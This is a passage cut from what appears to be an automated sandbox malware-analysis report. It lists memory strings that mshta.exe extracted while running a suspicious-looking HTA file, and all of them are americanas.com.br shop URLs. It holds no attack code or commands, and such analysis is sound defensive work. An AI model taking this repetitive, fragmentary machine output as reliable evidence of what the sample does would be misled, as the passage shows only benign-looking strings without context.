00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/guarda-roupa-bergamo
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guardaaixMd
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751370436.000000000A9EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678483978.000000000DF6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-natal
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-natal%
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776261386.000000000C0CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone-bauducco
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667689266.000000000C0B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/pisca-pisca
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669838233.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764328514.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667689266.000000000C0B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655218340.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649211244.000000000AC29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655582214.000000000AC44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/piscinas
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/piscinasazi
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776261386.000000000C0CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678483978.000000000DF6A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/presepio-de-natal
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/presepio-de-natalrD
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776261386.000000000C0CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/whisky-royal-salute
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/xbox-series-s
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca?conteudo=
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categori
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/agro-industria-e-comercio?chave=pfm_home_agro_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717572627.0000000009A5E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores/aquecedores-de-ar?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima5
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climameta.large
